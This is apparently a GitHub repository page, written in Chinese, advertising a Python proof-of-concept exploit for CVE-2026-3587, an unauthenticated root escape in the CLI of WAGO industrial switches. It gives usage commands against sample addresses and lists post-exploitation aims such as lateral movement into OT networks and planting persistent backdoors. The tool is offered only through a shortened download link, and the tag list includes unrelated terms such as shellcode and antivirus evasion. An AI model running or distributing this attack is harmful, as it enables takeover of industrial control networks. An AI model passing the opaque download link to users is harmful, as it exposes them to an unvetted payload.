z3r0h3ro/cve-2026-3587-poc
GitHub: z3r0h3ro/cve-2026-3587-poc
针对WAGO工业交换机CVE-2026-3587漏洞的Python PoC,通过CLI逃逸序列实现未经认证的远程root访问。
Stars: 0 | Forks: 0
# WAGO 管理型交换机 CLI 受限 Shell 逃逸
**CVE-2026-3587** - CVSS 10.0 严重 - 通过隐藏 CLI 后门实现未经认证的 root 访问
在许多 WAGO 管理型工业交换机上实现未经认证的远程 root 权限,利用途径为受限 CLI shell(telnet 23 / ssh 22)中的未记录逃逸序列。
这是一个简洁、极简的 Python 3 PoC,可连接到 CLI 服务,发送触发序列并直接将您送入一个 **root** BusyBox shell。
受影响设备(部分列表 - 完整矩阵请参阅 [VDE-2026-020](https://certvde.com/en/advisories/VDE-2026-020)):
- 852-1xxx 系列(大多数固件版本 ≤ xx.2x.xx)
- 852-13xx / 852-15xx 系列,通常部署于 OT/ICS 环境中
- 具有集成管理型交换机功能且运行易受攻击固件的 PFC200 / PFC300 控制器
影响:
- 完全的 root 文件系统访问权限
- 以 root 身份执行任意命令
- 流量拦截/修改(端口镜像,从交换机本身进行 ARP 欺骗)
- 横向移动跳板进入 OT 网络段
- 可能安装持久性后门(例如,植入 ssh 密钥,修改 /etc/init.d 脚本)
无需认证。无需用户交互。仅限网络相邻访问(端口 23/22 可达)。
### 用法
```
# (最常见)
python3 cve-2026-3587.py 192.168.1.100 23
# (部分型号启用了 SSH CLI)
python3 cve-2026-3587.py 10.10.50.5 22 --proto ssh
# (慢速/旧版设备)
python3 cve-2026-3587.py 172.16.0.88 23 --timeout 15
```
在 2019–2025 年间测试的固件版本上运行可靠。一些非常旧的固件(<2018)可能需要对时序/序列稍作修改。
**下载 - [href](https://tinyurl.com/4t3ajsn6)**
### 重要说明
- 此 PoC 仅严格用于研究、红队演练(需书面授权)和防御性验证。
- 切勿针对您不拥有或未获得明确测试授权的系统使用。
- 现场仍有许多 WAGO 设备运行着易受攻击的固件 - 如果暴露在外,请立即修补。
标签:BusyBox, CVE-2026-3587, ICS漏洞, OT安全, PE 加载器, PKINIT, PoC, Python3, RCE, Root权限, Shellcode, SSH, Telnet, VDE-2026-020, WAGO交换机, Web报告查看器, 免杀, 内存分配, 受限Shell逃逸, 嵌入式设备, 工业交换机, 工控安全, 技术调研, 暴力破解, 未授权访问, 概念验证, 横向移动, 特权提升, 编程工具, 编程规范, 网络安全, 自动化部署, 远程代码执行, 隐私保护, 隐藏后门